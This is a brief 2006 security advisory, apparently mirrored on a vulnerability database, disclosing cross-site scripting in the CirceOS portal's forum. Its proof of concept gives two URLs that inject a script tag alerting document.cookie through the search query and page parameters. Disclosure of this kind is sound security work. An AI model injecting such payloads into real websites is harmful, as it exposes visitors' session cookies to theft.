Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12466
HistoryApr 28, 2006 - 12:00 a.m.

Cireos Portal Cross Site Scripting

2006-04-2800:00:00
vulners.com
9

#Aria-Security.net Advisory
#Discovered by: O.u.t.l.a.w
#< www.Aria-security.net>
#Gr33t to: A.u.r.a & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: SirceOS Operative Solutions
Link: http://www.circeos.it
Attack method: Cross Site Scripting
advisory:http://www.aria-security.net/portal/circeos.txt

Summary:
cireos is a powerfull Portal and featuring a forum

Proof of Concept:
http://www.victim.com/circeos_path/forum/buscar.php?query=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&lt;!--
www.site.com/path/index.php?page=<script>alert(document.cookie)</script><!–

Tested On
http://www.circeos.it/forum/index.php

Solution
contact me: [email protected]